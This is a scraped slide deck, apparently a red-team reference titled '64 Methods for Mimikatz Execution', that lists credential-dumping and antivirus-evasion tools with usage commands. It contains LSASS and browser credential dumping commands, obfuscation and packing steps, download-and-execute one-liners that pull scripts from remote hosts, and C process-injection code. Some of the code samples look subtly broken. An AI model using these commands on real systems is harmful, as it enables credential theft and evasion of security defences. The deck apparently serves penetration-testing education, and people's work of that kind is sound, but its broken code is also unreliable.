SlideShare a Scribd company logo
1 of 66
Download to read offline
64 METHODS FOR MIMIKATZ EXECUTION
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
go build
./go-mimikatz
GO-MIMIKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/vyrus001/go-mimikatz
cargo build --release
./target/release/mimikatz-rs
RUSTY MIMIKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/memN0ps/mimikatz-rs
.Invoke-M1m1fud2.ps1
MIMIKATZFUD
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/HernanRodriguez1/MimikatzFUD
pip install -r requirements.txt
python pypykatz.py
python pypykatz.py lsa minidump -d
./lsass.dmp sekurlsa::logonpasswords
python pypykatz.py wmi "SELECT * FROM
Win32_Process WHERE Name='lsass.exe'"
sekurlsa::logonpasswords
PYPYKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/skelsec/pypykatz
.BetterSafetyKatz.exe --DumpCreds
.BetterSafetyKatz.exe --Minidump "C:WindowsTemplsass.dmp" -
-DumpCreds
.BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -
Username "domainusername" -Password "password123" --
DumpCreds
.BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -
Username "domainusername" -Password "password123" --
DumpCreds
BETTERSAFETYKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/Flangvik/BetterSafetyKatz
.CopyCat.exe --dump --local
.CopyCat.exe --memory "C:WindowsTempmemdump.raw" --
dump
.CopyCat.exe --hibernation "C:Windowshiberfil.sys" --dump
.CopyCat.exe --dump --target "192.168.1.100" --username
"domainusername" --password "password123"
COPYCAT
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mobdk/CopyCat
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1
PYFUSCATION
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/CBHue/PyFuscation
Invoke-Cats -pwds
Invoke-Cats -certs
Invoke-Cats -CustomCommand
INVOKE-CATS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/DanMcInerney/Invoke-Cats
csc.exe /platform:x64 /target:exe /unsafe winboost.cs
WINBOOST
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mobdk/WinBoost
.Invoke-Mimidogz.ps1
MIMIDOGZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/fir3d0g/mimidogz
"Add" > "Existing Item". Navigate to the `CoreClass` directory and
select all the `.cs` files.
Add a reference to `System.Management.Automation.dll` in your
project. To do this, right-click on your project in the solution
explorer and select "Add" > "Reference". In the "Reference Manager"
window, select "Assemblies" and search for
"System.Management.Automation". Select it and click "Add".
CORECLASS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mobdk/CoreClass
SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full"
"exit"
SHARPMIMIKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/XTeam-Wing/SharpMimikatz
Set-ExecutionPolicy Unrestricted
Import-Module .Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath C:PathToMyScript.ps1 -Command
All
INVOKE-OBFUSCATION
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/danielbohannon/Invoke-Obfuscation
Commands.txt
SIMPLEMIMIKATZOBFUSCATOR
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
pip install pycryptodome requests
python build.py
Host the "publish" directory on a web server or file share accessible
to the target machine.
On the target machine, navigate to the URL of the ClickOnce
package in a web browser.
CLICKONCEKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/sinmygit/ClickOnceKatz
import base64
import pymemimporter
# Load the base64-encoded module into memory
encoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE'
module_data = base64.b64decode(encoded_module)
# Import the module from memory
mem_importer = pymemimporter.PyMemImporter()
loaded_module = mem_importer.load_module('<module_name>',
module_data)
base64 -w0 <module_name>.py > <module_name>.base64
python <script_name>.py
PYMEMIMPORTER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/n1nj4sec/pymemimporter
dotnet run --project .SharpDPAPISharpDPAPI.csproj
dotnet run --project .SharpDPAPISharpDPAPI.csproj masterkeys
dotnet run --project .SharpDPAPISharpDPAPI.csproj
domainbackupkeys
SHARPDPAPI
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/GhostPack/SharpDPAPI
privilege::debug
sekurlsa::Plog
PLOG
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/GamehunterKaan/Plog
.StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath
<image_path> -OutputPath <output_path>
.StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath
extracted_secret.txt
STEGOKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/r13mann/StegoKatz
mimi.bat
.rundll32-hijack.ps1
LOADMIMIKATZWITHDINVOKE
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz
Invoke-WebRequest
https://raw.githubusercontent.com/corneacristian/mimikatz-
bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1
Set-ExecutionPolicy Unrestricted
.mimikatz-bypass.ps1
MIMIKATZ-BYPASS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/corneacristian/mimikatz-bypass
dotnet build -r win10-x64
katz.exe <MIMIKATZ_COMMAND>
UTILS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/ITh4cker/Utils
python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o
<OUTPUT_FILE>
python3 eyeworm.py -i <INPUT_FILE> -p <PAYLOAD_FILE> -o
<OUTPUT_FILE>
EYEWORM
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/imsellbaox/Eyeworm
beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python
drunkenkatz.py"
DRUNKENKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/ap3r/drunkenkatz
python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>
CALLBACK
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mobdk/CallBack
python mimikatz_byPass_Huorong.py
MIMIKATZ-BYPASS-HUORONG
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/q1ya/mimikatz-byPass-Huorong
python mimikatz_bypass.py
MIMIKATZ_BYPASS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/wangfly-me/mimikatz_bypass
cmd.exe mimikatz.html
HTML-MIMIKATZ-
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/vipserver/HTML-mimikatz-
cmd.exe mimikatz.js
MIMIKATZ.EXE-IN-JS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/hardw00t/Mimikatz.exe-in-JS
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g'
Invoke-Mimikatz.ps1
sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions
$Win32Functions #-/g" Invoke-Mimikatz.ps1
-HAVE-YOU-SEEN-THESE-KATZ-
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-
rundll32 *.log,#1
MIMIRUNNER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mobdk/MimiRunner
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd
c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile=
/LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
*** In the above command '/out:katz.exe katz.cs' the 'katz.cs' should be the path where initially powershell downloads the CS file ***
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object
System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5d
a0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll
/out:katz.exe share_ipshare_namekatz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug
sekurlsa::logonpasswords exit && del katz.*
cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object
System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5d
a0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll
/out:katz.exe %temp%katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit
&& del katz.* && move mimikatz.log %temp%katz.log && cd %temp% && del %temp%katz.cs
MIMIKATZ-PE-INJECTION
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/analyticsearch/Mimikatz-PE-Injection
.Invoke-NiNifox.ps1
NINIFOX
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/scottjosh/ninifox
dpapi::chrome /in:"%localappdata%GoogleChromeUser
DataDefaultCookies" /unprotect`
`dpapi::chrome /in:"%localappdata%GoogleChromeUser
DataDefaultLogin Data For Account" /unprotect`
`dpapi::chrome /in:"%localappdata%GoogleChromeUser
DataDefaultLogin Data" /unprotect
CHEXPORT
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/GamehunterKaan/Chexport
mimikatz.exe
mprotected.exe
mprotected.jpg.exe
mprotected.jpg.7z
MIMIK
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/MisterLobster22/mimik
eric.ps1
MY-OBFUSCATED-MIMIKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/lazaars/my-obfuscated-mimikatz
.Invoke-Mimikatz.ps1
INVOKE-MIMIKATZ-W10
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/VDA-Labs/Invoke-Mimikatz-W10
python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py
MIMIVADER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/lawja/MimiVader
.Invoke-Mimikatz
INVOKE-MIMIKATZ #1
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/syn-ack-zack/Invoke-Mimikatz
.invokemimikatz.ps1
INVOKE-MIMIKATZ #2
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/dfirdeferred/Invoke-Mimikatz
.XInvoke-Mimikatz.ps1
.wi10_Invoke-Mimikatz.ps1
MIMIKATZ_BYPASS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/izj007/mimikatz_bypass
cscript.exe dropper.js
JS_MIMIKATZDROPPER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/leinn32/JS_MimiKatzDropper
Invoke-Expression (New-Object
Net.Webclient).downloadstring('https://raw.githubusercontent.com/
Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command
'"privilege::debug"'
MIMICATS
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/Moon1705/mimicats
python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED
XORPACKER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/tmenochet/XorPacker
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2
-p '"coffee" "sleep 5000" "coffee" "exit"'
PEZOR
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/phra/PEzor
PePacker.exe mimikatz.exe -e
ATOMPEPACKER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/NUL0x4C/AtomPePacker
nim c -d:args NimRunPE.nim
NIM-RUNPE
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
nim c -d:release nimcrypt2.nim
./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --
outFile=ciphertext.txt
NIMCRYPT2
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/icyguider/Nimcrypt2
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-
obf.exe
PROTECTMYTOOLING
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mgeeky/ProtectMyTooling
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
XENCRYPT
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/the-xentropy/xencrypt
Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile
xenmimi.ps1
BETTERXENCRYPT
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/GetRektBoy724/BetterXencrypt
Invoke-AES-Encoder -InFile
invoke-mimikatz.ps1 -OutFile aesmimi.ps1
AES-ENCODER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/Chainski/AES-Encoder
./encryptor -f mimikatz.exe -o bin.enc
deliver.exe -d -c sekurlsa::logonpasswords -f bin.enc
MORTAR
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/0xsp-SRD/mortar
Browse Executable:
Generate Encryption:
.NET-CRYPTER
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/roast247/.NET-Crypter
sed - e '/<#/,/#>/c' "$1"
sed 's/^[[: space: ]]*#.*$//g' "$1" - e sed
's/Invoke-Mimikatz/RainbowsAndUnicorns/g' "$1" - e T'T
sed
-e's/DumpCreds/MoreRainbows/g' "$1"
Invoke-Obfuscation -ScriptPath ‘./Invoke-Mimikatz.ps1’ -Command ‘TokenAll1Out full_power.ps1’ -Quiet
Invoke-Obfuscation -ScriptPath '.2.IM_critical_words.ps1' -Command ‘TokenVariable1’ -Quiet > final.ps1
IEX (New-object Net. Webclient) .Downloadstring('http: //192.168.1.104:8000/final.ps1') ; RainbowsAndUnicorns -
MoreRainbows
CUSTOM MODS + INVOKE-OBFUSCATION
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/newlog/fud_mimikatz_talk
sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions
#-/g" Invoke-Mimikatz.ps1
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery –Force
Import-Module .obfuscat_Invoke-Mimikatz.ps1
Invoke-LSASSscraper
OBFUSCATED_INVOKE-MIMIKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe
"sekurlsa::logonPasswords full" exit
MIMIKATZ_ENCODED
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/mobx26/mimikatz_encoded
.decrypt.ps1
.mimikatz.exe "sekurlsa::logonPasswords full" exit
ENCRYPTED_MIMIKATZ
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/Sombody101/Encrypted_Mimikatz
sigthief.py -i c: WindowsSystem32consent.exe -t mimikatz. exe -o
MSCredentialTool.exe
SIGTHIEF
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
https://github.com/secretsquirrel/SigThief
#include <stdio.h>
#include <windows.h>
const char* cmd = "powershell.exe -windowstyle hidden -command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"";
void obfuscate(char* str)
{
int len = strlen(str);
for (int i = 0; i < len; i++) {
str[i] = str[i] ^ 0x41;
}
}
int main()
{
char* encoded_cmd =
"YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1p
bWlrYXR6IC1EdW1wQ3JlZHMK"";
obfuscate(encoded_cmd);
DWORD pid = GetCurrentProcessId();
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (process == NULL) {
printf("Error opening process. Error code: %lun", GetLastError());
return 1;
}
LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE);
if (remote_string == NULL) {
printf("Error allocating memory. Error code: %lun", GetLastError());
CloseHandle(process);
return 1;
}
BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL);
if (!write_result) {
printf("Error writing to process memory. Error code: %lun", GetLastError());
CloseHandle(process);
return 1;
}
HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL);
if (thread == NULL) {
printf("Error creating remote thread. Error code: %lun", GetLastError());
CloseHandle(process);
return 1;
}
WaitForSingleObject(thread, INFINITE);
VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE);
CloseHandle(process);
return 0;
}
MEMORY+SUSPENDED
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
#include <iostream>
#include <cstring>
using namespace std;
void obfuscate(char* s) {
for (int i = 0; s[i]; i++) {
s[i] = s[i] ^ 0xFF;
}
}
int main() {
char* str = new char[20];
strcpy(str, "password123");
// Obfuscate the string
obfuscate(str);
// Print the obfuscated string
cout << str << endl;
// Restore the original string
obfuscate(str);
// Print the original string
cout << str << endl;
delete[] str;
return 0;
XOR'D WITH 0XFF
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main()
{
char str1[] = "mimikatz.exe";
char str2[] = "powershell.exe";
char str3[] = "cmd.exe /c mimikatz.exe";
int len1 = strlen(str1);
int len2 = strlen(str2);
int len3 = strlen(str3);
for(int i = 0; i < len1; i++) {
str1[i] = str1[i] ^ 0xAA;
}
for(int i = 0; i < len2; i++) {
str2[i] = str2[i] ^ 0xAA;
}
for(int i = 0; i < len3; i++) {
str3[i] = str3[i] ^ 0xAA;
}
void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(mem, str1, sizeof(str1));
memcpy((char*)mem + sizeof(str1), str2, sizeof(str2));
memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3));
((void(*)())mem)();
return 0;
}
XORING EACH CHARACTER WITH THE VALUE 0XAA
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
#include <iostream>
#include <windows.h>
int main()
{
const char* encodedCmd =
"x44x43x4Dx53x63x72x61x70x00x2Dx61x20x2Dx6Ex6Fx70x62x00x2Dx6Ex6Fx70x23x00x2Dx6Ex6Fx70x69x00x2Dx61x20x2Dx6Ex6Fx70x77x00x2Dx70x00x2Dx65x00x2Dx74x00x2Dx72x00x2Dx75x00x2Dx6Ex00x20x22x26x2
8x2Ax2Cx2Ex30x32x34x36x38x3Ax3Cx3Ex40x42x44x46x48x4Ax4Cx4Ex50x52x54x56x58x5Ax5Cx5Ex60x62x64x66x68x6Ax6Cx6Ex70x72x74x76x78x7Ax7Cx7Ex80x82x84x86x88x8Ax8Cx8Ex90x92x94x96x98x9Ax9Cx9ExA0x
A2xA4xA6xA8xAAxACxAExB0xB2xB4xB6xB8xBAxBCxBExC0xC2xC4xC6xC8xCAxCCxCExD0xD2xD4xD6xD8xDAxDCxDExE0xE2xE4xE6xE8xEAxECxEExF0xF2xF4xF6xF8xFAxFCxFEx00x22";
DWORD pid;
HWND hwnd = FindWindowA(NULL, "Window Name");
GetWindowThreadProcessId(hwnd, &pid);
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
LPVOID allocSpace = VirtualAllocEx(hProc, NULL, strlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL);
HANDLE hThread = CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)allocSpace, NULL, NULL, NULL);
CloseHandle(hThread);
CloseHandle(hProc);
return 0;
}
DECODING AND STORING IT IN MEMORY
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MIMIKATZ_PATH "C:pathtomimikatz.exe"
int main()
{
// Load Mimikatz into memory
HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwFileSize = GetFileSize(hFile, NULL);
BYTE* pbFileData = (BYTE*)malloc(dwFileSize);
DWORD dwBytesRead;
ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL);
CloseHandle(hFile);
// Allocate memory for Mimikatz
LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copy Mimikatz to allocated memory
memcpy(lpMem, pbFileData, dwFileSize);
// Execute Mimikatz
DWORD dwExitCode;
DWORD dwThreadId;
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId);
WaitForSingleObject(hThread, INFINITE);
GetExitCodeThread(hThread, &dwExitCode);
// Free allocated memory
VirtualFree(lpMem, 0, MEM_RELEASE);
return 0;
}
INJECT AND EXECUTE MIMIKATZ IN MEMORY
Usage
HADESS.IO
POWERED BY
REDTEAMRECIPE.COM
REDTEAMRECIPE.COM
RedTeamRecipe is a platform designed for cybersecurity professionals who want to learn more
about red teaming and penetration testing. Red teaming is a practice where an organization
simulates a real-world cyber attack to identify vulnerabilities and improve their security
measures.
HADESS.IO
POWERED BY

More Related Content

What's hot

Celery: The Distributed Task Queue
Celery: The Distributed Task QueueCelery: The Distributed Task Queue
Celery: The Distributed Task QueueRichard Leland
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Virtual machine and javascript engine
Virtual machine and javascript engineVirtual machine and javascript engine
Virtual machine and javascript engineDuoyi Wu
 
이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정Arawn Park
 
Keeping a Secret with HashiCorp Vault
Keeping a Secret with HashiCorp VaultKeeping a Secret with HashiCorp Vault
Keeping a Secret with HashiCorp VaultMitchell Pronschinske
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key ManagementAnthony Ikeda
 
AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...
AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...
AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...Amazon Web Services Korea
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxAnurag Srivastava
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
Container Security
Container SecurityContainer Security
Container SecurityJie Liau
 
Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)
Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)
Monitoring Kubernetes with Prometheus (Kubernetes Ireland, 2016)Brian Brazil
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavRomansh Yadav
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 

What's hot (20)

Celery: The Distributed Task Queue
Celery: The Distributed Task QueueCelery: The Distributed Task Queue
Celery: The Distributed Task Queue
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Virtual machine and javascript engine
Virtual machine and javascript engineVirtual machine and javascript engine
Virtual machine and javascript engine
 
이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정
 
Keeping a Secret with HashiCorp Vault
Keeping a Secret with HashiCorp VaultKeeping a Secret with HashiCorp Vault
Keeping a Secret with HashiCorp Vault
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key Management
 
AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...
AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...
AWS Lambda 내부 동작 방식 및 활용 방법 자세히 살펴 보기 - 김일호 솔루션즈 아키텍트 매니저, AWS :: AWS Summit ...
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
HashiCorp's Vault - The Examples
HashiCorp's Vault - The ExamplesHashiCorp's Vault - The Examples
HashiCorp's Vault - The Examples
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
